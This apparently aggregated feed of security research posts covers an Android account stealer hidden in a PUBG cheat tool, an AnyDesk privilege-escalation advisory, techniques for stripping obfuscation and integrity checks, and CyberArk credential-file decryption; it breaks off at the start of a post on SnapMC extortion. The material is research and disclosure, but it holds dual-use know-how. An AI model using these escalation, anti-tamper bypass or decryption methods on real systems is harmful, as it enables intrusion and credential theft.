Normal view

There are new articles available, click to refresh the page.

Before yesterdayVulnerabily Research

McAfee Blogs
Social Network Account Stealers Hidden in Android Gaming Hacking ToolMcAfee Labs
19 October 2021 at 13:02

Social Network Account Stealers Hidden in Android Gaming Hacking Tool

McAfee Blogs

By: McAfee Labs

19 October 2021 at 13:02

Authored by: Wenfeng Yu

McAfee Mobile Research team recently discovered a new piece of malware that specifically steals Google, Facebook, Twitter, Telegram and PUBG game accounts. This malware hides in a game assistant tool called “DesiEsp” which is an assistant tool for PUBG game available on GitHub. Basically, cyber criminals added their own malicious code based on this DesiEsp open-source tool and published it on Telegram. PUBG game users are the main targets of this Android malware in all regions around the world but most infections are reported from the United States, India, and Saudi Arabia.

What is an ESP hack?

ESP Hacks, (short for Extra-Sensory Perception) are a type of hack that displays player information such as HP (Health Points), Name, Rank, Gun etc. It is like a permanent tuned-up KDR/HP Vision. ESP Hacks are not a single hack, but a whole category of hacks that function similarly and are often used together to make them more effective.

How can you be affected by this malware?

After investigation, it was found that this malware was spread in the channels related to PUBG game on the Telegram platform. Fortunately, this malware has not been found on Google Play.

Figure 1. Re-packaged hacking tool distributed in Telegram

Main dropper behavior

This malware will ask the user to allow superuser permission after running:

Figure 2. Initial malware requesting root access.

If the user denies superuser request the malware will say that the application may not work:

Figure 3. Error message when root access is not provided

When it gains root permission, it will start two malicious actions. First, it will steal accounts by accessing the system account database and application database.

Figure 4. Get google account from android system account database. — Figure 4. Get a Google account from the Android system account database.

Second, it will install an additional payload with package name “com.android.google.gsf.policy_sidecar_aps” using the “pm install” command. The payload package will be in the assets folder, and it will disguise the file name as “*.crt” or “*.mph”.

Figure 5. Payload disguised as a certificate file (crt extension)

Stealing social and gaming accounts

The dropped payload will not display icons and it does not operate directly on the screen of the user’s device. In the apps list of the system settings, it usually disguises the package name as something like “com.google.android.gsf” to make users think it is a system service of Google. It runs in the background in the way of Accessibility Service. Accessibility Service is an auxiliary function provided by the Android system to help people with physical disabilities use mobile apps. It will connect to other apps like a plug-in and can it access the Activity, View, and other resources of the connected app.

The malware will first try to get root permissions and IMEI (International Mobile Equipment Identity) code that later access the system account database. Of course, even if it does not have root access, it still has other ways to steal account information. Finally, it also will try to activate the device-admin to difficult its removal.

Methods to steal account information

The first method to steal account credentials that this malware uses is to monitor the login window and account input box text of the stolen app through the AccessibilityService interface to steal account information. The target apps include Facebook (com.facebook.kakana), Twitter (com.twitter.android), Google (com.google.android.gms) and PUBG MOBILE game (com.tencent.ig)

The second method is to steal account information (including account number, password, key, and token) by accessing the account database of the system, the user config file, and the database of the monitored app. This part of the malicious code is the same as the parent sample above:

Figure 6. Malware accessing Facebook account information using root privileges

Finally, the malware will report the stolen account information to the hacker’s server via HTTP.

Gaming users infected worldwide

PUBG games are popular all over the world, and users who use PUBG game assistant tools exist in all regions of the world. According to McAfee telemetry data, this malware and its variants affect a wide range of countries including the United States, India, and Saudi Arabia:

Figure 7. Top affected countries include USA, India and Saudi Arabia — Figure 7. Top affected countries include USA, India , and Saudi Arabia

Conclusion

The online game market is revitalizing as represented by e-sports. We can play games anywhere in various environments such as mobiles, tablets, and PCs (personal computers). Some users will be looking for cheat tools and hacking techniques to play the game in a slightly advantageous way. Cheat tools are inevitably hosted on suspicious websites by their nature, and users looking for cheat tools must step into the suspicious websites. Attackers are also aware of the desires of such users and use these cheat tools to attack them.

This malware is still constantly producing variants that use several ways to counter the detection of anti-virus software including packing, code obfuscation, and strings encryption, allowing itself to infect more game users.

McAfee Mobile Security detects this threat as Android/Stealer and protects you from this malware attack. Use security software on your device. Game users should think twice before downloading and installing cheat tools, especially when they request Superuser or accessibility service permissions.

Indicators of Compromise

Dropper samples

36d9e580c02a196e017410a6763f342eea745463cefd6f4f82317aeff2b7e1a5

fac1048fc80e88ff576ee829c2b05ff3420d6435280e0d6839f4e957c3fa3679

d054364014188016cf1fa8d4680f5c531e229c11acac04613769aa4384e2174b

3378e2dbbf3346e547dce4c043ee53dc956a3c07e895452f7e757445968e12ef

7e0ee9fdcad23051f048c0d0b57b661d58b59313f62c568aa472e70f68801417

6b14f00f258487851580e18704b5036e9d773358e75d01932ea9f63eb3d93973

706e57fb4b1e65beeb8d5d6fddc730e97054d74a52f70f57da36eda015dc8548

ff186c0272202954def9989048e1956f6ade88eb76d0dc32a103f00ebfd8538e

706e57fb4b1e65beeb8d5d6fddc730e97054d74a52f70f57da36eda015dc8548

3726dc9b457233f195f6ec677d8bc83531e8bc4a7976c5f7bb9b2cfdf597e86c

e815b1da7052669a7a82f50fabdeaece2b73dd7043e78d9850c0c7e95cc0013d

Payload samples

8ef54eb7e1e81b7c5d1844f9e4c1ba8baf697c9f17f50bfa5bcc608382d43778

4e08e407c69ee472e9733bf908c438dbdaebc22895b70d33d55c4062fc018e26

6e7c48909b49c872a990b9a3a1d5235d81da7894bd21bc18caf791c3cb571b1c

9099908a1a45640555e70d4088ea95e81d72184bdaf6508266d0a83914cc2f06

ca29a2236370ed9979dc325ea4567a8b97b0ff98f7f56ea2e82a346182dfa3b8

d2985d3e613984b9b1cba038c6852810524d11dddab646a52bf7a0f6444a9845

ef69d1b0a4065a7d2cc050020b349f4ca03d3d365a47be70646fd3b6f9452bf6

06984d4249e3e6b82bfbd7da260251d99e9b5e6d293ecdc32fe47dd1cd840654

Domain

hosting-b5476[.]gq

The post Social Network Account Stealers Hidden in Android Gaming Hacking Tool appeared first on McAfee Blog.

REDYOPS Labs
AnyDesk Escalation of Privilege (CVE-2021-40854)admin
18 October 2021 at 09:51

AnyDesk Escalation of Privilege (CVE-2021-40854)

REDYOPS Labs

By: admin

18 October 2021 at 09:51

Summary

Assigned CVE: CVE-2021-40854 has been assigned for the report of RedyOps Labs.

Known to Neurosoft’s RedyOps Labs since: 20/07/2021

Exploit Code: N/A

Vendor’s Advisory: https://anydesk.com/cve/2021-40854/

An Elevation of Privilege (EoP) exists in AnyDesk for Windows from versions 3.1.0 to 6.3.2 (excluding 6.2.6). The vulnerability described gives the ability to a low privileged user to gain access as NT AUTHORITY\SYSTEM.

The exploitation took place in an installed version of AnyDesk .

Description

When someone asks to perform a connection to your AnyDesk, the User Interface (UI) which is presented in order for you to accept the connection and specify the permissions, runs as NT AUTHORITY\SYSTEM.

In this same UI, you can open the chat log, by pressing the “Open Chat Log”. The notepad which opens, runs as NT AUTHORITY\SYSTEM .

The escalation from that point is trivial, as presented in the following video.

Exploitation

In order to Exploit the issue, no special program is needed .

Video PoC Step By Step

The video is pretty match easy to follow.

A low privileged user, opens the AnyDesk and performs a connection to his own ID.

In the popup, he opens the “Chat Log” and from inside the notepad the low privileged user, spawns a cmd.exe as NT AUTHORITY\SYSTEM.

Resources

RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at https://redyops.com/

Angel

Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at https://angelcyber.gr/

Illicium

Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at https://deceivewithillicium.com/

Neutrify

Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at https://neurosoft.gr/contact/

The post AnyDesk Escalation of Privilege (CVE-2021-40854) appeared first on REDYOPS Labs.

NCC Group Research
A Look At Some Real-World Obfuscation TechniquesNicolas Guigo
12 October 2021 at 13:00

A Look At Some Real-World Obfuscation Techniques

NCC Group Research

By: Nicolas Guigo

12 October 2021 at 13:00

Among the variety of penetration testing engagements NCC Group delivers, some – often within the gaming industry – require performing the assignment in a blackbox fashion against an obfuscated binary, and the client’s priorities revolve more around evaluating the strength of their obfuscation against content protection violations, rather than exercising the application’s security boundaries.

The following post aims at providing insight into the tools and methods used to conduct those engagements using real-world examples. While this approach allows for describing techniques employed by actual protections, only a subset of the material can be explicitly listed here (see disclaimer for more information).

Unpacking Phase

When first attempting to analyze a hostile binary, the first step is generally to unpack the actual contents of its sections from runtime memory. The standard way to proceed consists of letting the executable run until the unpacking stub has finished deobfuscating, decompressing and/or deciphering the executable’s sections. The unpacked binary can then be reconstructed, by dumping the recovered sections into a new executable and (usually) rebuilding the imports section from the recovered IAT(Import Address Table).

This can be accomplished in many ways including:

Debugging manually and using plugins such as Scylla to reconstruct the imports section
Python scripting leveraging Windows debugging libraries like winappdbg and executable file format libraries like pefile
Intel Pintools dynamically instrumenting the binary at run-time (JIT instrumentation mode recommended to avoid integrity checks)

Expectedly, these approaches can be thwarted by anti-debug mechanisms and various detection mechanisms which, in turn, can be evaded via more debugger plugins such as ScyllaHide or by implementing various hooks such as those highlighted by ICPin. Finally, the original entry point of the application can usually be identified by its immediate calls to canonical C++ language’s internal initialization functions such as _initterm() and _initterm_e.

While the dynamic method is usually sufficient, the below samples highlight automated implementations that were successfully used via a python script to handle a simple packer that did not require imports rebuilding, and a versatile (albeit slower) dynamic execution engine implementation allowing a more granular approach, fit to uncover specific behaviors.

Control Flow Flattening

Once unpacked, the binary under investigation exposes a number of functions obfuscated using control flow graph (CFG) flattening, a variety of antidebug mechanisms, and integrity checks. Those can be identified as a preliminary step by running instrumented under ICPin (sample output below).

Overview

When disassembled, the CFG of each obfuscated function exhibits the pattern below: a state variable has been added to the original flow, which gets initialized in the function prologue and the branching structure has been replaced by a loop of pointer table-based dispatchers (highlighted in white).

Each dispatch loop level contains between 2 and 16 indirect jumps to basic blocks (BBLs) actually implementing the function’s logic.

There are a number of ways to approach this problem, but the CFG flattening implemented here can be handled using a fully symbolic approach that does not require a dynamic engine, nor a real memory context. The first step is, for each function, to identify the loop using a loop-matching algorithm, then run a symbolic engine through it, iterating over all the possible index values and building an index-to-offset map, with the original function’s logic implemented within the BBL-chains located between the blocks belonging to the loop:

Real Destination(s) Recovery

The following steps consist of leveraging the index-to-offset map to reconnect these BBL-chains with each other, and recreate the original control-flow graph. As can be seen in the captures below, the value of the state variable is set using instruction-level obfuscation. Some BBL-chains only bear a static possible destination which can be swiftly evaluated.

For dynamic-destination BBL-chains, once the register used as a state variable has been identified, the next step is to identify the determinant symbols, i.e, the registers and memory locations (globals or local variables) that affect the value of the state register when re-entering the dispatch loop.

This can be accomplished by computing the intermediate language representation (IR) of the assembly flow graph (or BBLs) and building a dependency graph from it. Here we are taking advantage of a limitation of the obfuscator: the determinants for multi-destination BBLs are always contained within the BBL subgraph formed between two dispatchers.

With those determinants identified, the task that remains is to identify what condition these determinants are fulfilling, as well as what destinations in code we jump to once the condition has been evaluated. The Z3 SMT solver from Microsoft is traditionally used around dynamic symbolic engines (DSE) as a means to finding input values leading to new paths. Here, the deobfusactor uses its capabilities to identify the type of comparison the instructions are replacing.

For example, for the equal pattern, the code asks Z3 if 2 valid destination indexes (D1 and D2) exist such that:

If the determinants are equal, the value of the state register is equal to D1
If the determinants are different, the value of the state register is equal to D2

Finally, the corresponding instruction can be assembled and patched into the assembly, replacing the identified patterns with equivalent assembly sequences such as the ones below, where

mod0 and mod1 are the identified determinants
#SREG is the state register, now free to be repurposed to store the value of one of the determinants (which may be stored in memory):
#OFFSET0 is the offset corresponding to the destination index if the tested condition is true
#OFFSET1 is the offset corresponding to the destination index if the tested condition is false

class EqualPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JZ    #OFFSET0
NOP
JMP   #OFFSET1
'''

class UnsignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JA    #OFFSET0
NOP
JMP   #OFFSET1
'''

class SignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JG    #OFFSET0
NOP
JMP   #OFFSET1
'''

The resulting CFG, since every original block has been reattached directly to its real target(s), effectively separates the dispatch loop from the significant BBLs. Below is the result of this first pass against a sample function:

This approach does not aim at handling all possible theoretical cases; it takes advantage of the fact that the obfuscator only transforms a small set of arithmetic operations.

Integrity Check Removal

Once the flow graph has been unflattened, the next step is to remove the integrity checks. These can mostly be identified using a simple graph matching algorithm (using Miasm’s “MatchGraphJoker” expressions) which also constitutes a weakness in the obfuscator. In order to account for some corner cases, the detection logic implemented here involves symbolically executing the identified loop candidates, and recording their reads against the .text section in order to provide a robust identification.

On the above graph, the hash verification flow is highlighted in yellow and the failure case (in this case, sending the execution to an address with invalid instructions) in red. Once the loop has been positively identified, the script simply links the green basic blocks to remove the hash check entirely.

“Dead” Instructions Removal

The resulting assembly is unflattened, and does not include the integrity checks anymore, but still includes a number of “dead” instructions which do not have any effect on the function’s logic and can be removed. For example, in the sample below, the value of EAX is not accessed between its first assignment and its subsequent ones. Consequently, the first assignment of EAX, regardless of the path taken, can be safely removed without altering the function’s logic.

start:
    MOV   EAX, 0x1234
    TEST  EBX, EBX
    JNZ   path1
path0:
    XOR   EAX, EAX
path1:
    MOV   EAX, 0x1

Using a dependency graph (depgraph) again, but this time, keeping a map of ASM <-> IR (one-to-many), the following pass removes the assembly instructions for which the depgraph has determined all corresponding IRs are non-performative.

Finally, the framework-provided simplifications, such as bbl-merger can be applied automatically to each block bearing a single successor, provided the successor only has a single predecessor. The error paths can also be identified and “cauterized”, which should be a no-op since they should never be executed but smoothen the rebuilding of the executable.

A Note On Antidebug Mechanisms

While a number of canonical anti-debug techniques were identified in the samples; only a few will be covered here as the techniques are well-known and can be largely ignored.

PEB->isBeingDebugged

In the example below, the function checks the PEB for isBeingDebugged (offset 0x2) and send the execution into a stack-mangling loop before continuing execution which is leads to a certain crash, obfuscating context from a naive debugging attempt.

Debug Interrupts

Another mechanism involves debug software interrupts and vectored exception handlers, but is rendered easily comprehensible once the function has been processed. The code first sets two local variables to pseudorandom constant values, then registers a vectored exception handler via a call to AddVectoredExceptionHandler. An INT 0x3 (debug interrupt) instruction is then executed (via the indirect call to ISSUE_INT3_FN), but encoded using the long form of the instruction: 0xCD 0x03.

After executing the INT 0x3 instruction, the code flow is resumed in the exception handler as can be seen below.

If the exception code from the EXCEPTION_RECORD structure is a debug breakpoint, a bitwise NOT is applied to one of the constants stored on stack. Additionally, the Windows interrupt handler handles every debug exception assuming they stemmed from executing the short version of the instruction (0xCC), so were a debugger to intercept the exception, those two elements need to be taken into consideration in order for execution to continue normally.

Upon continuing execution, a small arithmetic operation checks that the addition of one of the initially set constants (0x8A7B7A99) and a third one (0x60D7B571) is equal to the bitwise NOT of the second initial constant (0x14ACCFF5), which is the operation performed by the exception handler.

0x8A7B7A99 + 0x60D7B571 == 0xEB53300AA == ~0x14ACCFF5

A variant using the same exception handler operates in a very similar manner, substituting the debug exception with an access violation triggered via allocating a guard page and accessing it (this behavior is also flagged by ICPin).

Rebuilding The Executable

Once all the passes have been applied to all the obfuscated functions, the patches can be recorded, then applied to a free area of the new executable, and a JUMP is inserted at the function’s original offset.

Example of a function before and after deobfuscation:

Obfuscator’s Integrity Checking Internals

It is generally unnecessary to dig into the details of an obfuscator’s integrity checking mechanism; most times, as described in the previous example, identifying its location or expected result is sufficient to disable it. However, this provides a good opportunity to demonstrate the use of a DSE to address an obfuscator’s internals – theoretically its most hardened part.

ICPin output immediately highlights a number of code locations performing incremental reads on addresses in the executable’s .text section. Some manual investigation of these code locations points us to the spot where a function call or branching instruction switches to the obfuscated execution flow. However, there are no clearly defined function frames and the entire set of executed instructions is too large to display in IDA.

In order to get a sense of the execution flow, a simple jitter callback can be used to gather all the executed blocks as the engine runs through the code. Looking at the discovered blocks, it becomes apparent that the code uses conditional instructions to alter the return address on the stack, and hides its real destination with opaque predicates and obfuscated logic.

Starting with that information, it would be possible to take a similar approach as in the previous example and thoroughly rebuild the IR CFG, apply simplifications, and recompile the new assembly using LLVM. However, in this instance, armed with the knowledge that this obfuscated code implements an integrity check, it is advantageous to leverage the capabilities of a DSE.

A CFG of the obfuscated flow can still be roughly computed, by recording every block executed and adding edges based on the tracked destinations. The stock simplifications and SSA form can be used to obtain a graph of the general shape below:

Deciphering The Data Blobs

On a first run attempt, one can observe 8-byte reads from blobs located in two separate memory locations in the .text section, which are then processed through a loop (also conveniently identified by the tracking engine). With the memX symbols representing constants in memory, and blob0 representing the sequentially read input from a 32bit ciphertext blob, the symbolic values extracted from the blobs look as follows, looping 32 times:

res = (blob0 + ((mem1 ^ mem2)*mul) + sh32l((mem1 ^ mem2), 0x5)) ^ (mem3 + sh32l(blob0, 0x4)) ^ (mem4 + sh32r(blob0,  0x5))

Inspection of the values stored at memory locations mem1 and mem2 reveals the following constants:

@32[0x1400DF45A]: 0xA46D3BBF
@32[0x14014E859]: 0x3A5A4206

0xA46D3BBF^0x3A5A4206 = 0x9E3779B9

0x9E3779B9 is a well-known nothing up my sleeve number, based on the golden ratio, and notably used by RC5. In this instance however, the expression points at another Feistel cipher, TEA, or Tiny Encryption Algorithm:

void decrypt (uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up; sum is 32*delta */
    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i<32; i++) {                         /* basic cycle start */
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    }
    v[0]=v0; v[1]=v1;
}

Consequently, the 128-bit key can be trivially recovered from the remaining memory locations identified by the symbolic engine.

Extracting The Offset Ranges

With the decryption cipher identified, the next step is to reverse the logic of computing ranges of memory to be hashed. Here again, the memory tracking execution engine proves useful and provides two data points of interest:
– The binary is not hashed in a continuous way; rather, 8-byte offsets are regularly skipped
– A memory region is iteratively accessed before each hashing

Using a DSE such as this one, symbolizing the first two bytes of the memory region and letting it run all the way to the address of the instruction that reads memory, we obtain the output below (edited for clarity):

-- MEM ACCESS: {BLOB0 & 0x7F 0 8, 0x0 8 64} + 0x140000000
# {BLOB0 0 8, 0x0 8 32} & 0x80 = 0x0
...

-- MEM ACCESS: {(({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32} 0 32, 0x0 32 64} + 0x140000000
# 0x0 = ({BLOB0 0 8, 0x0 8 32} & 0x80)?(0x0,0x1)
# ((({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32}) == 0xFFFFFFFF = 0x0
...

The accessed memory’s symbolic addresses alone provide a clear hint at the encoding: only 7 of the bits of each symbolized byte are used to compute the address. Looking further into the accesses, the second byte is only used if the first byte’s most significant bit is not set, which tracks with a simple unsigned integer base-128 compression. Essentially, the algorithm reads one byte at a time, using 7 bits for data, and using the last bit to indicate whether one or more byte should be read to compute the final value.

Identifying The Hashing Algorithm

In order to establish whether the integrity checking implements a known hashing algorithm, despite the static disassembly showing no sign of known constants, a memory tracking symbolic execution engine can be used to investigate one level deeper. Early in the execution (running the obfuscated code in its entirety may take a long time), one can observe the following pattern, revealing well-known SHA1 constants.

0x140E34F50 READ @32[0x140D73B5D]: 0x96F977D0
0x140E34F52 READ @32[0x140B1C599]: 0xF1BC54D1
0x140E34F54 READ @32[0x13FC70]: 0x0
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD0]: 0x67452301

0x140E34F50 READ @32[0x140D73B61]: 0x752ED515
0x140E34F52 READ @32[0x140B1C59D]: 0x9AE37E9C
0x140E34F54 READ @32[0x13FC70]: 0x1
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD4]: 0xEFCDAB89

0x140E34F50 READ @32[0x140D73B65]: 0xF9396DD4
0x140E34F52 READ @32[0x140B1C5A1]: 0x6183B12A
0x140E34F54 READ @32[0x13FC70]: 0x2
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD8]: 0x98BADCFE

0x140E34F50 READ @32[0x140D73B69]: 0x2A1B81B5
0x140E34F52 READ @32[0x140B1C5A5]: 0x3A29D5C3
0x140E34F54 READ @32[0x13FC70]: 0x3
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCDC]: 0x10325476

0x140E34F50 READ @32[0x140D73B6D]: 0xFB95EF83
0x140E34F52 READ @32[0x140B1C5A9]: 0x38470E73
0x140E34F54 READ @32[0x13FC70]: 0x4
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCE0]: 0xC3D2E1F0

Examining the relevant code addresses (as seen in the SSA notation below), it becomes evident that, in order to compute the necessary hash constants, a simple XOR instruction is used with two otherwise meaningless constants, rendering algorithm identification less obvious from static analysis alone.

And the expected SHA1 constants are stored on the stack:

0x96F977D0^0xF1BC54D1 ==> 0x67452301
0x752ED515^0x9AE37E9C ==> 0XEFCDAB89
0xF9396DD4^0x6183B12A ==> 0X98BADCFE
0x2A1B81B5^0x3A29D5C3 ==> 0X10325476
0xFB95EF83^0x38470E73 ==> 0XC3D2E1F0

Additionally, the SHA1 algorithm steps can be further observed in the SSA graph, such as the ROTL-5 and ROTL-30 operations, plainly visible in the IL below.

Final Results

The entire integrity checking logic recovered from the obfuscator implemented in Python below was verified to produce the same digest, as when running under the debugger, or a straightforward LLVM jitter. The parse_ranges() function handles the encoding, while the accumulate_bytes() generator handles the deciphering and processing of both range blobs and skipped offset blobs.

Once the hashing of the memory ranges dictated by the offset table has completed, the 64bit values located at the offsets deciphered from the second blob are subsequently hashed. Finally, once the computed hash value has been successfully compared to the valid digest stored within the RWX .text section of the executable, the execution flow is deemed secure and the obfuscator proceeds to decipher protected functions within the .text section.

def parse_ranges(table):
  ranges = []
  rangevals = []
  tmp = []
  for byte in table:
    tmp.append(byte)
    if not byte&0x80:
      val = 0
      for i,b in enumerate(tmp):
        val |= (b&0x7F)<<(7*i)
      rangevals.append(val)
      tmp = [] # reset
  offset = 0
  for p in [(rangevals[i], rangevals[i+1]) for i in range(0, len(rangevals), 2)]:
    offset += p[0]
    if offset == 0xFFFFFFFF:
      break
    ranges.append((p[0], p[1]))
    offset += p[1]
  return ranges

def accumulate_bytes(r, s):
  # TEA Key is 128 bits
  dw6 = 0xF866ED75
  dw7 = 0x31CFE1EF
  dw4 = 0x1955A6A0
  dw5 = 0x9880128B
  key = struct.pack('IIII', dw6, dw7, dw4, dw5)
  # Decipher ranges plaintext
  ranges_blob = pe[pe.virt2off(r[0]):pe.virt2off(r[0])+r[1]]
  ranges = parse_ranges(Tea(key).decrypt(ranges_blob))
  # Decipher skipped offsets plaintext (8bytes long)
  skipped_blob = pe[pe.virt2off(s[0]):pe.virt2off(s[0])+s[1]]
  skipped_decrypted = Tea(key).decrypt(skipped_blob)
  skipped = sorted( \
    [int.from_bytes(skipped_decrypted[i:i+4], byteorder='little', signed=False) \
        for i in range(0, len(skipped_decrypted), 4)][:-2:2] \
  )
  skipped_copy = skipped.copy()
  next_skipped = skipped.pop(0)
  current = 0x0
  for rr in ranges:
    current += rr[0]
    size = rr[1]
    # Get the next 8 bytes to skip
    while size and next_skipped and next_skipped = 0
      yield blob
      current = next_skipped+8
      next_skipped = skipped.pop(0) if skipped else None
    blob = pe[pe.rva2off(current):pe.rva2off(current)+size]
    yield blob
    current += len(blob)
  # Append the initially skipped offsets
  yield b''.join(pe[pe.rva2off(rva):pe.rva2off(rva)+0x8] for rva in skipped_copy)
  return

def main():
  global pe
  hashvalue = hashlib.sha1()
  hashvalue.update(b'\x7B\x0A\x97\x43')
  with open(argv[1], "rb") as f:
    pe = PE(f.read())
  accumulator = accumulate_bytes((0x140A85B51, 0xFCBCF), (0x1409D7731, 0x12EC8))
  # Get all hashed bytes
  for blob in accumulator:
    hashvalue.update(blob)
  print(f'SHA1 FINAL: {hashvalue.hexdigest()}')
  return

Disclaimer

None of the samples used in this publication were part of an NCC Group engagement. They were selected from publicly available binaries whose obfuscators exhibited features similar to previously encountered ones.

Due to the nature of this material, specific content had to be redacted, and a number of tools that were created as part of this effort could not be shared publicly.

Despite these limitations, the author hopes the technical content shared here is sufficient to provide the reader with a stimulating read.

References

Reverse engineering and decrypting CyberArk vault credential files

Fox-IT

By: Jelle Vergeer

12 October 2021 at 07:42

Author: Jelle Vergeer

This blog will be a technical deep-dive into CyberArk credential files and how the credentials stored in these files are encrypted and decrypted. I discovered it was possible to reverse engineer the encryption and key generation algorithms and decrypt the encrypted vault password. I also provide a python implementation to decrypt the contents of the files.

Introduction

It was a bit more than a year ago that we did a penetration test for a customer where we came across CyberArk. During the penetration test we tested the implementation of their AD tiering model and they used CyberArk to implement this. During the penetration test we were able to get access to the CyberArk Privileged Session Manager (PSM) server. We found several .cred CyberArk related files on this server. At the time of the assignment I suspected the files were related to accessing the CyberArk Vault. This component stores all passwords used by CyberArk. The software seemed to be able to access the vault using the files with no additional user input necessary. These credential files contain several fields, including an encrypted password and an “AdditionalInformation” field. I immediately suspected I could reverse or break the crypto to recover the password, though the binaries were quite large and complex (C++ classes everywhere).

A few months later during another assignment for another customer we again found CyberArk related credential files, but again, nobody knew how to decrypt them. So during a boring COVID stay-at-home holiday I dove into the CreateCredFile.exe binary, used to create new credential files, and started reverse engineering the logic. Creating a dummy credential file using the CreateCredFile utility looks like to following:

Creating a new credential file with CreateCredFile.exe

The encryption and key generation algorithms

It appears there are several types of credential files (Password, Token, PKI, Proxy and KeyPair). For this exercise we will look at the password type. The details in the file can be encrypted using several algorithms:

DPAPI protected machine storage
DPAPI protected user storage
Custom

The default seemed to be the custom one, and after some effort I started to understand the logic how the software encrypts and decrypts the password in the file. The encryption algorithm is roughly the following:

First the software generates 20 random bytes and converts this to a hexadecimal string. This string is stored in the internal CCAGCredFile object for later use. This basically is the “AdditionalInformation” field in the credential files. When the software actually enters the routine to encrypt the password, it will generate a string that will be used to generate the final AES key. I will refer to this string as the base key. This string will consist of the following parts, appended together:

The Application Type restriction, converted to lower case, hashed with SHA1 and base64 encoded.
The Executable Path restriction, converted to lower case.
The Machine IP restriction.
The Machine Hostname restriction, converted to lower case.
The OS Username restriction, converted to lower case.
The 20 random bytes, or AdditionalInformation field.

An example base string that will be used to generate the AES key

Note that by default, the software will not apply the additional restrictions, only relying on the additional info field, present in the credential files. After the base key is generated, the software will generate the actual encryption key used for encrypting and decrypting credentials in the credential files. It will start by creating a SHA1 context, and update the context with the base key. Next it will create two copies of the context. The first context is updated with the integer ‘1’, and the second is updated with the integer ‘2’, both in big endian format. The finalized digest of the first context serves as the first part of the key, appended by the first 12 bytes of the finalized second digest. The AES key is thus 32 bytes long.

When encrypting a value, the software generates some random bytes to use as initialization vector (IV) , and stores the IV in the first block of encrypted bytes. Furthermore, when a value is encrypted, the software will encrypt the value itself, combined with the hash of the value. I assume this is done to verify the decryption routine was successful and the data is not corrupted.

Decrypting credential files

Because, by default, the software will only rely on the random bytes as base key, which are included in the credential file, we can generate the correct AES key to decrypt the encrypted contents in the file. I implemented a Python utility to decrypt CyberArk Credential files and it can be downloaded here. The additional verification attributes the software can use to include in the base key can be provided as command line arguments to the decryption tool. Most of these can be either guessed, or easily discovered, as an attacker will most likely already have a foothold in the network, so a hostname or IP address is easily uncovered. In some cases the software even stores these verification attributes in the file as it asks to include the restrictions in the credential file when creating one using the CreateCredFile.exe utility.

Decrypting a credential file using the decryption tool.

Defense

How to defend against attackers from decrypting the CyberArk vault password in these credential files? First off, prevent an attacker from gaining access to the credential files in the first place. Protect your credential files and don’t leave them accessible by users or systems that don’t need access to them. Second, when creating credential files using the CreateCredFile utility, prefer the “Use Operating System Protected Storage for credentials file secret” option to protect the credentials with an additional (DPAPI) encryption layer. If this encryption is applied, an attacker will need access to the system on which the credential file was generated in order to decrypt the credential file.

Responsible Disclosure

We reported this issue at CyberArk and they released a new version mitigating the decryption of the credential file by changing the crypto implementation and making the DPAPI option the default. We did not have access to the new version to verify these changes.

Timeline:

20-06-2021 – Reported issue at CyberArk.
21/23/27/28-06-2021 – Communication back and forth with questions and explanation.
29-06-2021 – Call with CyberArk. They released a new version which should mitigate the issue.

Fox-IT
SnapMC skips ransomware, steals datamikestokkel
11 October 2021 at 19:15

SnapMC skips ransomware, steals data

Fox-IT

By: mikestokkel

11 October 2021 at 19:15

Over the past few months NCC Group has observed an increasing number of data breach extortion cases, where the attacker steals data and threatens to publish said data online if the victim decides not to pay. Given the current threat landscape, most notable is the absence of ransomware or any technical attempt at disrupting the victim’s operations.

Within the data breach extortion investigations, we have identified a cluster of activities defining a relatively constant modus operandi described in this article. We track this adversary as SnapMC and have not yet been able to link it to any known threat actors. The name SnapMC is derived from the actor’s rapid attacks, generally completed in under 30 minutes, and the exfiltration tool mc.exe it uses.

